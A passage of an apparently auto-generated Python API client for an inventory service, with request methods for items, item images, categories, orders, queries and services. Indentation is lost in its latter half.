        raise ValueError("Missing the required parameter `category` when calling `categories_put`")

    resource_path = '/categories/'.replace('{format}', 'json')
    path_params = {}

    query_params = {}
    # 'id' travels as a query-string parameter; 'category' is the body.
    if 'id' in params:
        query_params['id'] = params['id']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'category' in params:
        body_params = params['category']

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = ['APIKey', 'AccountID']

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Category',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def item_add_post(self, item, **kwargs):
    """
    Create a new inventory item.

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param ItemRequest item: Item to create. (required)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: Item
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.item_add_post_with_http_info(item, **kwargs)
    return self.item_add_post_with_http_info(item, **kwargs)
def item_add_post_with_http_info(self, item, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.item_add_post_with_http_info(item, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param ItemRequest item: Item to create. (required)
    :return: Item
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises.
    all_params = ['item']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # Snapshot the local namespace so declared args and kwargs can be
    # read uniformly below. NOTE(review): relies on locals() semantics —
    # statement order here must not change.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method item_add_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'item' is set
    if ('item' not in params) or (params['item'] is None):
        raise ValueError("Missing the required parameter `item` when calling `item_add_post`")

    resource_path = '/item/add/'.replace('{format}', 'json')
    path_params = {}

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # The item payload is sent as the request body.
    if 'item' in params:
        body_params = params['item']

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = ['APIKey', 'AccountID']

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Item',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def item_addbulk_post(self, items, **kwargs):
    """
    Create several inventory items in one request.

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param list[ItemRequest] items: Items to create. (required)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: Response
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.item_addbulk_post_with_http_info(items, **kwargs)
    return self.item_addbulk_post_with_http_info(items, **kwargs)
def item_addbulk_post_with_http_info(self, items, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.item_addbulk_post_with_http_info(items, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param list[ItemRequest] items: Items to create. (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises.
    all_params = ['items']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # Snapshot the local namespace so declared args and kwargs can be
    # read uniformly below. NOTE(review): relies on locals() semantics —
    # statement order here must not change.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method item_addbulk_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'items' is set
    if ('items' not in params) or (params['items'] is None):
        raise ValueError("Missing the required parameter `items` when calling `item_addbulk_post`")

    resource_path = '/item/addbulk/'.replace('{format}', 'json')
    path_params = {}

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # The whole item list is sent as the request body.
    if 'items' in params:
        body_params = params['items']

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = ['APIKey', 'AccountID']

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Response',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def item_delete(self, id, **kwargs):
    """
    Remove the item identified by *id*.

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param str id: item id to remove (required)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: Response
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.item_delete_with_http_info(id, **kwargs)
    return self.item_delete_with_http_info(id, **kwargs)
def item_delete_with_http_info(self, id, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.item_delete_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: item id to remove (required)
    :return: Response
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # Snapshot the local namespace so declared args and kwargs can be
    # read uniformly below. NOTE(review): relies on locals() semantics —
    # statement order here must not change.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method item_delete" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `item_delete`")

    resource_path = '/item/'.replace('{format}', 'json')
    path_params = {}

    query_params = {}
    # 'id' travels as a query-string parameter, not in the body.
    if 'id' in params:
        query_params['id'] = params['id']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = ['APIKey', 'AccountID']

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Response',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def item_get(self, id, **kwargs):
    """
    Fetch the item identified by *id*.

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param str id: Item ID to open. (required)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: Item
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.item_get_with_http_info(id, **kwargs)
    return self.item_get_with_http_info(id, **kwargs)
def item_get_with_http_info(self, id, **kwargs):
    """
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.item_get_with_http_info(id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str id: Item ID to open. (required)
    :return: Item
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments this endpoint accepts; anything else raises.
    all_params = ['id']
    all_params.append('callback')
    all_params.append('_return_http_data_only')

    # Snapshot the local namespace so declared args and kwargs can be
    # read uniformly below. NOTE(review): relies on locals() semantics —
    # statement order here must not change.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method item_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params) or (params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `item_get`")

    resource_path = '/item/'.replace('{format}', 'json')
    path_params = {}

    query_params = {}
    # 'id' travels as a query-string parameter, not in the body.
    if 'id' in params:
        query_params['id'] = params['id']

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    if not header_params['Accept']:
        del header_params['Accept']

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type([])

    # Authentication setting
    auth_settings = ['APIKey', 'AccountID']

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Item',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def item_media_delete(self, imageurl, **kwargs):
    """
    Remove the item image identified by *imageurl*.

    Synchronous by default; pass a `callback` function keyword to make
    the request asynchronously, in which case the request thread is
    returned and the callback receives the response.

    :param str imageurl: URL of image to remove (required)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: Response
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        return self.item_media_delete_with_http_info(imageurl, **kwargs)
    return self.item_media_delete_with_http_info(imageurl, **kwargs)
def item_media_delete_with_http_info(self, imageurl, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_media_delete_with_http_info(imageurl, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str imageurl: URL of image to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['imageurl']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_media_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'imageurl' is set
if ('imageurl' not in params) or (params['imageurl'] is None):
raise ValueError("Missing the required parameter `imageurl` when calling `item_media_delete`")
resource_path = '/item-media/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'imageurl' in params:
query_params['imageurl'] = params['imageurl']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_media_post(self, id, image, **kwargs):
"""
This endpoint is currently in testing.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_media_post(id, image, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Valid item id to bind image to. (required)
:param file image: Image. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_media_post_with_http_info(id, image, **kwargs)
else:
(data) = self.item_media_post_with_http_info(id, image, **kwargs)
return data
def item_media_post_with_http_info(self, id, image, **kwargs):
"""
This endpoint is currently in testing.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_media_post_with_http_info(id, image, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Valid item id to bind image to. (required)
:param file image: Image. (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'image']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_media_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `item_media_post`")
# verify the required parameter 'image' is set
if ('image' not in params) or (params['image'] is None):
raise ValueError("Missing the required parameter `image` when calling `item_media_post`")
resource_path = '/item-media/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
if 'image' in params:
local_var_files['image'] = params['image']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['multipart/form-data', 'application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def item_put(self, id, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_put(id, item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: item id to update. (required)
:param ItemRequest item: New item information. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.item_put_with_http_info(id, item, **kwargs)
else:
(data) = self.item_put_with_http_info(id, item, **kwargs)
return data
def item_put_with_http_info(self, id, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.item_put_with_http_info(id, item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: item id to update. (required)
:param ItemRequest item: New item information. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'item']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method item_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `item_put`")
# verify the required parameter 'item' is set
if ('item' not in params) or (params['item'] is None):
raise ValueError("Missing the required parameter `item` when calling `item_put`")
resource_path = '/item/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'item' in params:
body_params = params['item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def items_count_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.items_count_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float minprice: Min price of items to find
:param float maxprice: Max price of items to find
:param ItemRequest query: Item to query against system.
:return: float
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.items_count_post_with_http_info(**kwargs)
else:
(data) = self.items_count_post_with_http_info(**kwargs)
return data
def items_count_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.items_count_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float minprice: Min price of items to find
:param float maxprice: Max price of items to find
:param ItemRequest query: Item to query against system.
:return: float
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['minprice', 'maxprice', 'query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method items_count_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/items/count/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'minprice' in params:
query_params['minprice'] = params['minprice']
if 'maxprice' in params:
query_params['maxprice'] = params['maxprice']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='float',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def items_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.items_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float minprice: Min price of items to find
:param float maxprice: Max price of items to find
:param ItemRequest query: Item to query against system.
:return: list[Item]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.items_post_with_http_info(**kwargs)
else:
(data) = self.items_post_with_http_info(**kwargs)
return data
def items_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.items_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float minprice: Min price of items to find
:param float maxprice: Max price of items to find
:param ItemRequest query: Item to query against system.
:return: list[Item]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['minprice', 'maxprice', 'query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method items_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/items/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'minprice' in params:
query_params['minprice'] = params['minprice']
if 'maxprice' in params:
query_params['maxprice'] = params['maxprice']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Item]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def orders_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.orders_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param OrderRequest query: Order to query against item invoices.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.orders_post_with_http_info(**kwargs)
else:
(data) = self.orders_post_with_http_info(**kwargs)
return data
def orders_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.orders_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param OrderRequest query: Order to query against item invoices.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method orders_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/orders/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def orders_services_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.orders_services_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param OrderRequest query: Order to query against service invoices.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.orders_services_post_with_http_info(**kwargs)
else:
(data) = self.orders_services_post_with_http_info(**kwargs)
return data
def orders_services_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.orders_services_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param OrderRequest query: Order to query against service invoices.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method orders_services_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/orders/services/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def query_post(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.query_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float page: Current page index.
:param str categoryid: Get items under specified category id.
:param str sort: Comma delimited Sort string. ie ; +ordprice. Please use number based fields only
:param str search: Performs a regex pattern match against the items within your account
:param float minprice: Min price in hundreds (cents).
:param float maxprice: Max price in hundreds (cents).
:param ItemRequest query: Custom parameters to query against system.
:return: list[Item]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.query_post_with_http_info(**kwargs)
else:
(data) = self.query_post_with_http_info(**kwargs)
return data
def query_post_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.query_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param float page: Current page index.
:param str categoryid: Get items under specified category id.
:param str sort: Comma delimited Sort string. ie ; +ordprice. Please use number based fields only
:param str search: Performs a regex pattern match against the items within your account
:param float minprice: Min price in hundreds (cents).
:param float maxprice: Max price in hundreds (cents).
:param ItemRequest query: Custom parameters to query against system.
:return: list[Item]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'categoryid', 'sort', 'search', 'minprice', 'maxprice', 'query']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method query_post" % key
)
params[key] = val
del params['kwargs']
resource_path = '/query/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page' in params:
query_params['page'] = params['page']
if 'categoryid' in params:
query_params['categoryid'] = params['categoryid']
if 'sort' in params:
query_params['sort'] = params['sort']
if 'search' in params:
query_params['search'] = params['search']
if 'minprice' in params:
query_params['minprice'] = params['minprice']
if 'maxprice' in params:
query_params['maxprice'] = params['maxprice']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'query' in params:
body_params = params['query']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Item]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def services_delete(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_delete(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of the service to update (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.services_delete_with_http_info(id, **kwargs)
else:
(data) = self.services_delete_with_http_info(id, **kwargs)
return data
def services_delete_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.services_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ID of the service to update (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method services_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `services_delete`")
resource_path = '/services/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
